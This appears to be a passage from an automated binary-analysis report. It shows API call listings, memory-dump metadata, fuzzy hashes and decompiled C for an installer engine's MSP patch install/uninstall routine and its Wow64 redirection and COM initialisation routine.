                                                                                                                                                                  0x0043829c
                                                                                                                                                                  0x0043829f
                                                                                                                                                                  0x004382a6
                                                                                                                                                                  0x004382a9
                                                                                                                                                                  0x004382aa
                                                                                                                                                                  0x0043836b
                                                                                                                                                                  0x0043836b
                                                                                                                                                                  0x00438370
                                                                                                                                                                  0x00438370
                                                                                                                                                                  0x00438375
                                                                                                                                                                  0x0043837c
                                                                                                                                                                  0x00438384
                                                                                                                                                                  0x00438384
                                                                                                                                                                  0x00438391
                                                                                                                                                                  0x0043839b
                                                                                                                                                                  0x0043839b
                                                                                                                                                                  0x004383b1

                                                                                                                                                                  APIs
                                                                                                                                                                  • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000003,F0000040,00000003,00000000,00000000,00000003,?,000007D0,00000000,000007D0,00000000,00000003,00000000), ref: 00438281
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0043828B
                                                                                                                                                                  • CryptCreateHash.ADVAPI32(?,?,00000000,00000000,?), ref: 004382C8
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004382D2
                                                                                                                                                                  • CryptDestroyHash.ADVAPI32(00000000), ref: 00438384
                                                                                                                                                                  • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0043839B
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004383B4
                                                                                                                                                                  • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000), ref: 004383EC
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 004383F6
                                                                                                                                                                  • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00008004,00000001), ref: 0043842F
                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0043843D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CryptErrorLast$Hash$Context$AcquireCreateDestroyFileParamPointerRelease
                                                                                                                                                                  • String ID: cryputil.cpp
                                                                                                                                                                  • API String ID: 1716956426-2185294990
                                                                                                                                                                  • Opcode ID: a663ab9fd9d6b17b0fffe7031fa32abdb2290cbdf5a8d94913381da743af50b5
                                                                                                                                                                  • Instruction ID: 6800663b84aa99896491c85a727cbb850c1869e8d4ec4c318f534a8867d48127
                                                                                                                                                                  • Opcode Fuzzy Hash: a663ab9fd9d6b17b0fffe7031fa32abdb2290cbdf5a8d94913381da743af50b5
                                                                                                                                                                  • Instruction Fuzzy Hash: F651A931A00364ABEB319B659D44BDBB6E4FF0C741F014176BE49E6190D7798D808EE9
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 77%
                                                                                                                                                                  			E0041D0BC(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr* _a28) {
                                                                                                                                                                  				signed int _v8;
                                                                                                                                                                  				char _v1584;
                                                                                                                                                                  				signed int _v1588;
                                                                                                                                                                  				signed int _v1592;
                                                                                                                                                                  				signed int _v1596;
                                                                                                                                                                  				signed int _v1600;
                                                                                                                                                                  				signed int _v1604;
                                                                                                                                                                  				intOrPtr* _v1608;
                                                                                                                                                                  				char _v1612;
                                                                                                                                                                  				signed int _v1616;
                                                                                                                                                                  				intOrPtr _v1620;
                                                                                                                                                                  				intOrPtr _v1624;
                                                                                                                                                                  				intOrPtr _v1628;
                                                                                                                                                                  				intOrPtr _v1632;
                                                                                                                                                                  				intOrPtr _v1636;
                                                                                                                                                                  				void* __ebx;
                                                                                                                                                                  				void* __edi;
                                                                                                                                                                  				void* __esi;
                                                                                                                                                                  				signed int _t101;
                                                                                                                                                                  				signed int _t111;
                                                                                                                                                                  				signed int _t112;
                                                                                                                                                                  				signed int _t121;
                                                                                                                                                                  				signed int _t123;
                                                                                                                                                                  				signed int _t131;
                                                                                                                                                                  				signed int _t135;
                                                                                                                                                                  				signed int _t145;
                                                                                                                                                                  				intOrPtr _t173;
                                                                                                                                                                  				intOrPtr* _t174;
                                                                                                                                                                  				signed int _t175;
                                                                                                                                                                  				signed int _t178;
                                                                                                                                                                  				void* _t179;
                                                                                                                                                                  				intOrPtr _t189;
                                                                                                                                                                  				signed int _t190;
                                                                                                                                                                  				signed int _t192;
                                                                                                                                                                  				signed int _t194;
                                                                                                                                                                  				signed int _t195;
                                                                                                                                                                  
                                                                                                                                                                  				_t101 =  *0x4560d0; // 0xae480e18
                                                                                                                                                                  				_v8 = _t101 ^ _t195;
                                                                                                                                                                  				_v1620 = _a4;
                                                                                                                                                                  				_t172 = _a12;
                                                                                                                                                                  				_v1628 = _a20;
                                                                                                                                                                  				_t189 = _a8;
                                                                                                                                                                  				_v1636 = _a24;
                                                                                                                                                                  				_v1608 = _a28;
                                                                                                                                                                  				_t190 = 0;
                                                                                                                                                                  				_push(0x628);
                                                                                                                                                                  				_t177 =  !=  ? 1 : 0x102;
                                                                                                                                                                  				_push(0);
                                                                                                                                                                  				_push( &_v1584);
                                                                                                                                                                  				_v1632 = _a12;
                                                                                                                                                                  				_v1624 = 0x102;
                                                                                                                                                                  				E004267C0(_a12,  !=  ? 1 : 0x102, _t189, 0,  *((intOrPtr*)( *((intOrPtr*)(_t189 + 8)) + 0x98)));
                                                                                                                                                                  				_v1612 = 0;
                                                                                                                                                                  				_v1604 = 0;
                                                                                                                                                                  				_v1596 = 0;
                                                                                                                                                                  				_v1592 = 0;
                                                                                                                                                                  				_v1588 = 0;
                                                                                                                                                                  				_v1600 = 0;
                                                                                                                                                                  				_t178 = 0;
                                                                                                                                                                  				_v1616 = 0;
                                                                                                                                                                  				if( *((intOrPtr*)(_t189 + 0x2c)) <= 0) {
                                                                                                                                                                  					L16:
                                                                                                                                                                  					_t111 = E00435549(_t178, 1, _v1628, _v1624, _v1620, _v1636, _a16,  &_v1584);
                                                                                                                                                                  					__eflags = _t111;
                                                                                                                                                                  					if(_t111 >= 0) {
                                                                                                                                                                  						_t112 =  *(_t189 + 0x1c);
                                                                                                                                                                  						_t179 = 0;
                                                                                                                                                                  						__eflags = _t112;
                                                                                                                                                                  						if(_t112 == 0) {
                                                                                                                                                                  							L25:
                                                                                                                                                                  							_t192 = E0041AC12(_t189,  *((intOrPtr*)( *((intOrPtr*)(_t189 + 8)) + 0x9c)),  *((intOrPtr*)( *((intOrPtr*)(_t189 + 8)) + 0xa0)), _t172, _a16,  &_v1588, _t179);
                                                                                                                                                                  							__eflags = _t192;
                                                                                                                                                                  							if(_t192 >= 0) {
                                                                                                                                                                  								_t181 =  &_v1600;
                                                                                                                                                                  								_t192 = E0041AC12(_t189,  *((intOrPtr*)( *((intOrPtr*)(_t189 + 8)) + 0x9c)),  *((intOrPtr*)( *((intOrPtr*)(_t189 + 8)) + 0xa0)), _t172, _a16,  &_v1600, 1);
                                                                                                                                                                  								__eflags = _t192;
                                                                                                                                                                  								if(_t192 >= 0) {
                                                                                                                                                                  									_push( *((intOrPtr*)(_t189 + 0xc)));
                                                                                                                                                                  									_push(_v1600);
                                                                                                                                                                  									_push(_v1596);
                                                                                                                                                                  									_push(E0040E2BB( *((intOrPtr*)(_t189 + 0x24))));
                                                                                                                                                                  									E00402003(2, 0x20000132,  *((intOrPtr*)( *((intOrPtr*)(_t189 + 8)))));
                                                                                                                                                                  									_t121 =  *((intOrPtr*)(_t189 + 0x24)) - 1;
                                                                                                                                                                  									__eflags = _t121;
                                                                                                                                                                  									if(_t121 == 0) {
                                                                                                                                                                  										_t173 = 0;
                                                                                                                                                                  										_t123 = E00433C35( &_v1600,  &_v1588, L" REBOOT=ReallySuppress", 0);
                                                                                                                                                                  										__eflags = _t123;
                                                                                                                                                                  										if(_t123 >= 0) {
                                                                                                                                                                  											_push(L"IGNOREDEPENDENCIES");
                                                                                                                                                                  											_t194 = E00433CEA( &_v1588, L"%ls %ls=ALL", _v1588);
                                                                                                                                                                  											__eflags = _t194;
                                                                                                                                                                  											if(__eflags >= 0) {
                                                                                                                                                                  												_t194 = E00435768(__eflags, _v1592,  *((intOrPtr*)(_t189 + 0xc)), _v1588,  &_v1612);
                                                                                                                                                                  												__eflags = _t194;
                                                                                                                                                                  												if(_t194 >= 0) {
                                                                                                                                                                  													L48:
                                                                                                                                                                  													E00435855( &_v1584);
                                                                                                                                                                  													__eflags = _v1604;
                                                                                                                                                                  													if(_v1604 != 0) {
                                                                                                                                                                  														E004380AB(_v1604);
                                                                                                                                                                  													}
                                                                                                                                                                  													__eflags = _v1596;
                                                                                                                                                                  													if(_v1596 != 0) {
                                                                                                                                                                  														E004380AB(_v1596);
                                                                                                                                                                  													}
                                                                                                                                                                  													__eflags = _v1588;
                                                                                                                                                                  													if(_v1588 != 0) {
                                                                                                                                                                  														E004380AB(_v1588);
                                                                                                                                                                  													}
                                                                                                                                                                  													__eflags = _v1600;
                                                                                                                                                                  													if(_v1600 != 0) {
                                                                                                                                                                  														E004380AB(_v1600);
                                                                                                                                                                  													}
                                                                                                                                                                  													__eflags = _v1592;
                                                                                                                                                                  													if(_v1592 != 0) {
                                                                                                                                                                  														E004380AB(_v1592);
                                                                                                                                                                  													}
                                                                                                                                                                  													_t131 = _v1612 - _t173;
                                                                                                                                                                  													__eflags = _t131;
                                                                                                                                                                  													if(_t131 == 0) {
                                                                                                                                                                  														 *_v1608 = _t173;
                                                                                                                                                                  													} else {
                                                                                                                                                                  														_t135 = _t131 - 1;
                                                                                                                                                                  														__eflags = _t135;
                                                                                                                                                                  														if(_t135 == 0) {
                                                                                                                                                                  															 *_v1608 = 1;
                                                                                                                                                                  														} else {
                                                                                                                                                                  															__eflags = _t135 == 1;
                                                                                                                                                                  															if(_t135 == 1) {
                                                                                                                                                                  																 *_v1608 = 2;
                                                                                                                                                                  															}
                                                                                                                                                                  														}
                                                                                                                                                                  													}
                                                                                                                                                                  													__eflags = _v8 ^ _t195;
                                                                                                                                                                  													return L004267AF(_t194, _v8 ^ _t195, _t189, _t194);
                                                                                                                                                                  												}
                                                                                                                                                                  												_push("Failed to uninstall MSP package.");
                                                                                                                                                                  												L46:
                                                                                                                                                                  												_push(_t194);
                                                                                                                                                                  												E00430A57();
                                                                                                                                                                  												L47:
                                                                                                                                                                  												goto L48;
                                                                                                                                                                  											}
                                                                                                                                                                  											_push("Failed to add the list of dependencies to ignore to the properties.");
                                                                                                                                                                  											goto L46;
                                                                                                                                                                  										}
                                                                                                                                                                  										_push("Failed to add reboot suppression property on uninstall.");
                                                                                                                                                                  										goto L46;
                                                                                                                                                                  									}
                                                                                                                                                                  									_t145 = _t121 - 1;
                                                                                                                                                                  									__eflags = _t145;
                                                                                                                                                                  									if(_t145 == 0) {
                                                                                                                                                                  										L32:
                                                                                                                                                                  										_t173 = 0;
                                                                                                                                                                  										_t194 = E00433C35(_t181,  &_v1588, L" PATCH=\"", 0);
                                                                                                                                                                  										__eflags = _t194;
                                                                                                                                                                  										if(_t194 >= 0) {
                                                                                                                                                                  											_t194 = E00433C35(_t181,  &_v1588, _v1592, 0);
                                                                                                                                                                  											__eflags = _t194;
                                                                                                                                                                  											if(_t194 >= 0) {
                                                                                                                                                                  												_t194 = E00433C35(_t181,  &_v1588, L"\" REBOOT=ReallySuppress", 0);
                                                                                                                                                                  												__eflags = _t194;
                                                                                                                                                                  												if(__eflags >= 0) {
                                                                                                                                                                  													_t194 = E00434F98(__eflags,  *((intOrPtr*)(_t189 + 0xc)), 0, 5, _v1588,  &_v1612);
                                                                                                                                                                  													__eflags = _t194;
                                                                                                                                                                  													if(_t194 >= 0) {
                                                                                                                                                                  														goto L48;
                                                                                                                                                                  													}
                                                                                                                                                                  													_push("Failed to install MSP package.");
                                                                                                                                                                  													goto L46;
                                                                                                                                                                  												}
                                                                                                                                                                  												_push("Failed to add reboot suppression property on install.");
                                                                                                                                                                  												goto L46;
                                                                                                                                                                  											}
                                                                                                                                                                  											_push("Failed to add patches to PATCH property on install.");
                                                                                                                                                                  											goto L46;
                                                                                                                                                                  										}
                                                                                                                                                                  										_push("Failed to add PATCH property on install.");
                                                                                                                                                                  										goto L46;
                                                                                                                                                                  									}
                                                                                                                                                                  									__eflags = _t145 != 3;
                                                                                                                                                                  									if(_t145 != 3) {
                                                                                                                                                                  										L23:
                                                                                                                                                                  										_t173 = 0;
                                                                                                                                                                  										goto L48;
                                                                                                                                                                  									}
                                                                                                                                                                  									goto L32;
                                                                                                                                                                  								}
                                                                                                                                                                  								_push("Failed to add properties to obfuscated argument string.");
                                                                                                                                                                  								L12:
                                                                                                                                                                  								_push(_t192);
                                                                                                                                                                  								E00430A57();
                                                                                                                                                                  								_t173 = 0;
                                                                                                                                                                  								goto L47;
                                                                                                                                                                  							}
                                                                                                                                                                  							_push("Failed to add properties to argument string.");
                                                                                                                                                                  							goto L12;
                                                                                                                                                                  						}
                                                                                                                                                                  						__eflags =  *_t112;
                                                                                                                                                                  						if( *_t112 == 0) {
                                                                                                                                                                  							goto L25;
                                                                                                                                                                  						}
                                                                                                                                                                  						_t194 = E00435046(0x1fdf, _t112, 0);
                                                                                                                                                                  						__eflags = _t194;
                                                                                                                                                                  						if(_t194 >= 0) {
                                                                                                                                                                  							_t179 = 0;
                                                                                                                                                                  							__eflags = 0;
                                                                                                                                                                  							goto L25;
                                                                                                                                                                  						}
                                                                                                                                                                  						_push( *(_t189 + 0x1c));
                                                                                                                                                                  						E00430A57(_t194, "Failed to enable logging for package: %ls to: %ls",  *((intOrPtr*)( *((intOrPtr*)(_t189 + 8)))));
                                                                                                                                                                  						goto L23;
                                                                                                                                                                  					}
                                                                                                                                                                  					_push("Failed to initialize external UI handler.");
                                                                                                                                                                  					goto L12;
                                                                                                                                                                  				} else {
                                                                                                                                                                  					goto L1;
                                                                                                                                                                  				}
                                                                                                                                                                  				while(1) {
                                                                                                                                                                  					L1:
                                                                                                                                                                  					_t174 =  *((intOrPtr*)( *((intOrPtr*)(_t189 + 0x28)) + 4 + _t178 * 8));
                                                                                                                                                                  					if( *((intOrPtr*)(_t189 + 0x24)) != 2) {
                                                                                                                                                                  						goto L5;
                                                                                                                                                                  					}
                                                                                                                                                                  					_t194 = E00413BE9(_t178, _t189,  *((intOrPtr*)(_t174 + 0x14)),  *((intOrPtr*)(_t174 + 0x24)),  &_v1604);
                                                                                                                                                                  					if(_t194 < 0) {
                                                                                                                                                                  						E00430A57(_t194, "Failed to get cached path for MSP package: %ls",  *_t174);
                                                                                                                                                                  						goto L23;
                                                                                                                                                                  					}
                                                                                                                                                                  					_t192 = E004314A9(_v1604,  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t174 + 0x7c)))) + 0x18)),  &_v1596);
                                                                                                                                                                  					if(_t192 < 0) {
                                                                                                                                                                  						_push("Failed to build MSP path.");
                                                                                                                                                                  						goto L12;
                                                                                                                                                                  					} else {
                                                                                                                                                                  						_t175 = _v1596;
                                                                                                                                                                  						_t190 = 0;
                                                                                                                                                                  						L6:
                                                                                                                                                                  						if(_v1592 == 0) {
                                                                                                                                                                  							L8:
                                                                                                                                                                  							_t192 = E00433C35(_t178,  &_v1592, _t175, 0);
                                                                                                                                                                  							if(_t192 < 0) {
                                                                                                                                                                  								_push("Failed to append patch.");
                                                                                                                                                                  								goto L12;
                                                                                                                                                                  							}
                                                                                                                                                                  							_t178 = _v1616 + 1;
                                                                                                                                                                  							_v1616 = _t178;
                                                                                                                                                                  							if(_t178 >=  *((intOrPtr*)(_t189 + 0x2c))) {
                                                                                                                                                                  								_t172 = _v1632;
                                                                                                                                                                  								goto L16;
                                                                                                                                                                  							}
                                                                                                                                                                  							_t190 = 0;
                                                                                                                                                                  							continue;
                                                                                                                                                                  						}
                                                                                                                                                                  						_t192 = E00433C35(_t178,  &_v1592, ";", _t190);
                                                                                                                                                                  						if(_t192 < 0) {
                                                                                                                                                                  							_push("Failed to semi-colon delimit patches.");
                                                                                                                                                                  							goto L12;
                                                                                                                                                                  						}
                                                                                                                                                                  						goto L8;
                                                                                                                                                                  					}
                                                                                                                                                                  					L5:
                                                                                                                                                                  					_t175 =  *(_t174 + 0x90);
                                                                                                                                                                  					goto L6;
                                                                                                                                                                  				}
                                                                                                                                                                  			}







































                                                                                                                                                                  0x0041d230
                                                                                                                                                                  0x0041d1ab
                                                                                                                                                                  0x0041d1af
                                                                                                                                                                  0x0041d211
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041d1b1
                                                                                                                                                                  0x0041d1b1
                                                                                                                                                                  0x0041d1b7
                                                                                                                                                                  0x0041d1c1
                                                                                                                                                                  0x0041d1c8
                                                                                                                                                                  0x0041d1e2
                                                                                                                                                                  0x0041d1f2
                                                                                                                                                                  0x0041d1f6
                                                                                                                                                                  0x0041d276
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041d276
                                                                                                                                                                  0x0041d1fe
                                                                                                                                                                  0x0041d1ff
                                                                                                                                                                  0x0041d208
                                                                                                                                                                  0x0041d23c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041d23c
                                                                                                                                                                  0x0041d20a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041d20a
                                                                                                                                                                  0x0041d1dc
                                                                                                                                                                  0x0041d1e0
                                                                                                                                                                  0x0041d235
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041d235
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041d1e0
                                                                                                                                                                  0x0041d1bb
                                                                                                                                                                  0x0041d1bb
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x0041d1bb

                                                                                                                                                                  Strings
                                                                                                                                                                  • Failed to add reboot suppression property on install., xrefs: 0041D3BE
                                                                                                                                                                  • Failed to add PATCH property on install., xrefs: 0041D379
                                                                                                                                                                  • Failed to build MSP path., xrefs: 0041D211
                                                                                                                                                                  • Failed to uninstall MSP package., xrefs: 0041D45F
                                                                                                                                                                  • Failed to add patches to PATCH property on install., xrefs: 0041D39C
                                                                                                                                                                  • IGNOREDEPENDENCIES, xrefs: 0041D412
                                                                                                                                                                  • Failed to add the list of dependencies to ignore to the properties., xrefs: 0041D437
                                                                                                                                                                  • %ls %ls=ALL, xrefs: 0041D423
                                                                                                                                                                  • Failed to add reboot suppression property on uninstall., xrefs: 0041D40B
                                                                                                                                                                  • Failed to append patch., xrefs: 0041D276
                                                                                                                                                                  • Failed to get cached path for MSP package: %ls, xrefs: 0041D225
                                                                                                                                                                  • Failed to initialize external UI handler., xrefs: 0041D26F
                                                                                                                                                                  • REBOOT=ReallySuppress, xrefs: 0041D3F4
                                                                                                                                                                  • Failed to enable logging for package: %ls to: %ls, xrefs: 0041D2A5
                                                                                                                                                                  • Failed to install MSP package., xrefs: 0041D3EA
                                                                                                                                                                  • PATCH=", xrefs: 0041D362
                                                                                                                                                                  • Failed to add properties to argument string., xrefs: 0041D2E2
                                                                                                                                                                  • Failed to add properties to obfuscated argument string., xrefs: 0041D313
                                                                                                                                                                  • " REBOOT=ReallySuppress, xrefs: 0041D3A7
                                                                                                                                                                  • Failed to semi-colon delimit patches., xrefs: 0041D235
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  C-Code - Quality: 62%
                                                                                                                                                                  			E004358BF(signed int _a4, intOrPtr* _a8, signed int _a12) {
                                                                                                                                                                  				signed int _v8;
                                                                                                                                                                  				signed int _v12;
                                                                                                                                                                  				char _v16;
                                                                                                                                                                  				_Unknown_base(*)()* _v20;
                                                                                                                                                                  				_Unknown_base(*)()* _t38;
                                                                                                                                                                  				signed int _t46;
                                                                                                                                                                  				signed int _t53;
                                                                                                                                                                  				signed int _t58;
                                                                                                                                                                  				signed short _t61;
                                                                                                                                                                  				signed int _t64;
                                                                                                                                                                  				signed int _t65;
                                                                                                                                                                  				intOrPtr* _t66;
                                                                                                                                                                  				intOrPtr* _t67;
                                                                                                                                                                  				signed int _t68;
                                                                                                                                                                  				signed int _t69;
                                                                                                                                                                  				signed int _t71;
                                                                                                                                                                  				signed int _t74;
                                                                                                                                                                  				signed int _t79;
                                                                                                                                                                  				struct HINSTANCE__* _t81;
                                                                                                                                                                  				signed int _t82;
                                                                                                                                                                  
                                                                                                                                                                  				_t64 = 0;
                                                                                                                                                                  				_v16 = 0;
                                                                                                                                                                  				_v12 = 0;
                                                                                                                                                                  				_v8 = 0;
                                                                                                                                                                  				_t81 = GetModuleHandleA("kernel32.dll");
                                                                                                                                                                  				if(_t81 != 0) {
                                                                                                                                                                  					_t38 = GetProcAddress(_t81, "IsWow64Process");
                                                                                                                                                                  					__eflags = _t38;
                                                                                                                                                                  					if(_t38 == 0) {
                                                                                                                                                                  						_t79 = 0;
                                                                                                                                                                  						L9:
                                                                                                                                                                  						__imp__CoCreateInstance(0x457f2c, 0, 1, 0x43bcb0,  &_v8);
                                                                                                                                                                  						_t82 = 0x457f2c;
                                                                                                                                                                  						__eflags = 0x457f2c;
                                                                                                                                                                  						if(0x457f2c < 0) {
                                                                                                                                                                  							L23:
                                                                                                                                                                  							__eflags = _t64;
                                                                                                                                                                  							if(_t64 == 0) {
                                                                                                                                                                  								L26:
                                                                                                                                                                  								L27:
                                                                                                                                                                  								_t66 = _v12;
                                                                                                                                                                  								if(_t66 != 0) {
                                                                                                                                                                  									 *((intOrPtr*)( *_t66 + 8))(_t66);
                                                                                                                                                                  								}
                                                                                                                                                                  								_t67 = _v8;
                                                                                                                                                                  								if(_t67 != 0) {
                                                                                                                                                                  									 *((intOrPtr*)( *_t67 + 8))(_t67);
                                                                                                                                                                  								}
                                                                                                                                                                  								return _t82;
                                                                                                                                                                  							}
                                                                                                                                                                  							_t46 =  *_t79(_v16);
                                                                                                                                                                  							__eflags = _t46;
                                                                                                                                                                  							if(_t46 != 0) {
                                                                                                                                                                  								goto L26;
                                                                                                                                                                  							}
                                                                                                                                                                  							ExitProcess(1);
                                                                                                                                                                  						}
                                                                                                                                                                  						_t68 = 0;
                                                                                                                                                                  						__eflags = 0;
                                                                                                                                                                  						_t74 = 0x457f2c;
                                                                                                                                                                  						while(1) {
                                                                                                                                                                  							__eflags =  *((intOrPtr*)(_t74 + _t68 * 4)) -  *((intOrPtr*)(0x43bca0 + _t68 * 4));
                                                                                                                                                                  							_t74 = 0x457f2c;
                                                                                                                                                                  							if(__eflags != 0) {
                                                                                                                                                                  								break;
                                                                                                                                                                  							}
                                                                                                                                                                  							_t68 = _t68 + 1;
                                                                                                                                                                  							__eflags = _t68 - 4;
                                                                                                                                                                  							if(_t68 != 4) {
                                                                                                                                                                  								continue;
                                                                                                                                                                  							}
                                                                                                                                                                  							L17:
                                                                                                                                                                  							 *0x457f48 = 1;
                                                                                                                                                                  							L18:
                                                                                                                                                                  							__eflags = _a4;
                                                                                                                                                                  							if(_a4 == 0) {
                                                                                                                                                                  								L21:
                                                                                                                                                                  								_v8 = _v8 & 0x00000000;
                                                                                                                                                                  								 *_a8 = _v8;
                                                                                                                                                                  								_t71 = _a12;
                                                                                                                                                                  								__eflags = _t71;
                                                                                                                                                                  								if(_t71 != 0) {
                                                                                                                                                                  									_t29 =  &_v12;
                                                                                                                                                                  									 *_t29 = _v12 & 0x00000000;
                                                                                                                                                                  									__eflags =  *_t29;
                                                                                                                                                                  									 *_t71 = _v12;
                                                                                                                                                                  								}
                                                                                                                                                                  								goto L23;
                                                                                                                                                                  							}
                                                                                                                                                                  							_t82 = E00435A58( &_v12, _v8, _a4,  &_v12);
                                                                                                                                                                  							__eflags = _t82;
                                                                                                                                                                  							if(_t82 < 0) {
                                                                                                                                                                  								goto L23;
                                                                                                                                                                  							}
                                                                                                                                                                  							_t53 = _v8;
                                                                                                                                                                  							_t82 =  *((intOrPtr*)( *_t53 + 0x54))(_t53, _v12, 0);
                                                                                                                                                                  							__eflags = _t82;
                                                                                                                                                                  							if(_t82 < 0) {
                                                                                                                                                                  								goto L23;
                                                                                                                                                                  							}
                                                                                                                                                                  							goto L21;
                                                                                                                                                                  						}
                                                                                                                                                                  						_t69 = 0;
                                                                                                                                                                  						__eflags = 0;
                                                                                                                                                                  						while(1) {
                                                                                                                                                                  							__eflags =  *((intOrPtr*)(_t74 + _t69 * 4)) -  *((intOrPtr*)(0x43bc90 + _t69 * 4));
                                                                                                                                                                  							_t74 = 0x457f2c;
                                                                                                                                                                  							if(__eflags != 0) {
                                                                                                                                                                  								goto L18;
                                                                                                                                                                  							}
                                                                                                                                                                  							_t69 = _t69 + 1;
                                                                                                                                                                  							__eflags = _t69 - 4;
                                                                                                                                                                  							if(_t69 != 4) {
                                                                                                                                                                  								continue;
                                                                                                                                                                  							}
                                                                                                                                                                  							goto L17;
                                                                                                                                                                  						}
                                                                                                                                                                  						goto L18;
                                                                                                                                                                  					}
                                                                                                                                                                  					_v20 = GetProcAddress(_t81, "Wow64DisableWow64FsRedirection");
                                                                                                                                                                  					_t65 = GetProcAddress(_t81, "Wow64EnableWow64FsRedirection");
                                                                                                                                                                  					_t79 = GetProcAddress(_t81, "Wow64RevertWow64FsRedirection");
                                                                                                                                                                  					_t58 = _v20;
                                                                                                                                                                  					__eflags = _t58;
                                                                                                                                                                  					if(_t58 == 0) {
                                                                                                                                                                  						L7:
                                                                                                                                                                  						_t64 = 0;
                                                                                                                                                                  						goto L9;
                                                                                                                                                                  					}
                                                                                                                                                                  					__eflags = _t65;
                                                                                                                                                                  					if(_t65 == 0) {
                                                                                                                                                                  						goto L7;
                                                                                                                                                                  					}
                                                                                                                                                                  					__eflags = _t79;
                                                                                                                                                                  					if(_t79 == 0) {
                                                                                                                                                                  						goto L7;
                                                                                                                                                                  					}
                                                                                                                                                                  					 *_t58( &_v16);
                                                                                                                                                                  					_t64 =  *_t65(1);
                                                                                                                                                                  					goto L9;
                                                                                                                                                                  				}
                                                                                                                                                                  				_t61 = GetLastError();
                                                                                                                                                                  				_t85 =  <=  ? _t61 : _t61 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  				_t82 =  >=  ? 0x80004005 :  <=  ? _t61 : _t61 & 0x0000ffff | 0x80070000;
                                                                                                                                                                  				E004300D9(0x80004005, "xmlutil.cpp", 0x90, _t82);
                                                                                                                                                                  				goto L27;
                                                                                                                                                                  			}
                                                                                                                                                                  0x00435963
                                                                                                                                                                  0x004358e5
                                                                                                                                                                  0x004358f6
                                                                                                                                                                  0x00435900
                                                                                                                                                                  0x0043590e
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,00435E6E,00000000,?,00000000), ref: 004358D9
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,004226E2,00401F17,004021A7,004021A3,00000000,004021A3), ref: 004358E5
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00435925
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00435931
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64EnableWow64FsRedirection), ref: 0043593C
                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00435946
                                                                                                                                                                  • CoCreateInstance.OLE32(00457F2C,00000000,00000001,0043BCB0,?,?,?,?,?,?,?,?,?,?,?,004226E2), ref: 00435980
                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00435A2F
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000000.00000002.256545154.0000000000429000.00000080.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000000.00000002.255471614.0000000000400000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.255488985.0000000000401000.00000080.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256374653.0000000000427000.00000040.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.256755399.000000000043B000.00000002.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257304277.0000000000456000.00000004.00020000.sdmp
                                                                                                                                                                  • Associated: 00000000.00000002.257317891.000000000045C000.00000002.00020000.sdmp
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: AddressProc$CreateErrorExitHandleInstanceLastModuleProcess
